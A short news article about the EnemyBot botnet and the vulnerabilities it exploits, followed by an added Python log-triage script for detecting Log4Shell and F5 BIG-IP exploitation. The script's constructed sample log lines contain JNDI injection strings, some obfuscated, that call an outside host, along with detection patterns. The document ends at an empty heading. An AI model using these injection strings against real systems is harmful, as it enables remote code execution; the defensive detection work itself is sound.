EnemyBot malware botnet expanding its target list with recently-discovered vulnerabilities in F5 hardware and VMware software.
Initially discovered in March 2022, EnemyBot’s original target was the wide range of Linux variants used in IoT devices. But a recent analysis released by AT&T Alien Labs showed EnemyBot is launching attacks against a number of recent vulnerabilities in content management systems, web servers, F5 hardware, and VMware software.
There’s quite a list of targets in the AT&T analysis, with the high-profile Log4j remote code execution (RCE) vulnerabilities from last year (CVE-2021-44228 and CVE-2021-45046), a VMware Workspace ONE vulnerability (CVE-2022-22954) discovered in April, and a REST vulnerability in F5’s BIG-IP application delivery server (CVE-2022-1388) published in May.
Nine of the vulnerabilities, including several in WordPress plugins and one in Adobe ColdFusion 11 discovered in February, have no CVE assigned.
If EnemyBot successfully infects a target, it will try to find other vulnerable hosts to infect.
Its C&C servers can also invoke a range of commands on EnemyBot, including various DDoS tools, shell commands, reverse shell creation, and a TLS attack. It will also try to infect Android devices connected through the USB port.
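The exploitation attempts the article lists leave traces in ordinary web-server logs. As an added example that is not part of the article or the AT&T analysis, the Python script below triages constructed Apache-style access-log lines for Log4Shell-style JNDI lookups (CVE-2021-44228 and CVE-2021-45046), including URL-encoded and `${lower:}`-obfuscated forms, and for POST requests to the BIG-IP iControl REST bash endpoint publicly associated with CVE-2022-1388 exploitation. The log lines and IP addresses are constructed, and the endpoint path comes from public advisories rather than from this article.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2022:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Jun/2022:12:00:02 +0000] "GET /login?user=${jndi:ldap://198.51.100.9/a} HTTP/1.1" 400 0 "-" "curl/7.68.0"
203.0.113.9 - - [10/Jun/2022:12:00:03 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 233 "-" "python-requests/2.27"
203.0.113.10 - - [10/Jun/2022:12:00:04 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F198.51.100.9%2Fb%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0 ${jndi:dns://198.51.100.9/c}"
"""

# Combined-format access log: client, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Log4j lookup wrappers used to hide the literal "jndi" string, e.g. ${lower:j} or ${::-j}.
OBF_RE = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}|\$\{::-([^{}]*)\}', re.IGNORECASE)
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
# iControl REST endpoint publicly associated with CVE-2022-1388 (assumed path, from public advisories).
BIGIP_BASH_RE = re.compile(r'^/mgmt/tm/util/bash', re.IGNORECASE)


def normalize(value: str) -> str:
    """URL-decode twice (attackers double-encode) and unwrap obfuscation lookups until stable."""
    value = unquote(unquote(value))
    previous = None
    while previous != value:
        previous = value
        value = OBF_RE.sub(lambda m: m.group(1) or m.group(2) or "", value)
    return value


def triage(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, sorted tags) for every line carrying a known exploitation pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        fields = {k: normalize(v) for k, v in m.groupdict().items()}
        tags = set()
        for field in ("path", "ref", "ua"):  # Log4j logs any of these, so all are injection points
            if JNDI_RE.search(fields[field]):
                tags.add("log4shell:" + field)
        if fields["method"] == "POST" and BIGIP_BASH_RE.match(fields["path"]):
            tags.add("bigip-cve-2022-1388")
        if tags:
            hits.append((fields["ip"], sorted(tags)))
    return hits


if __name__ == "__main__":
    for ip, tags in triage(SAMPLE_LOG):
        print(ip, ",".join(tags))
```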
Indicators of Compromise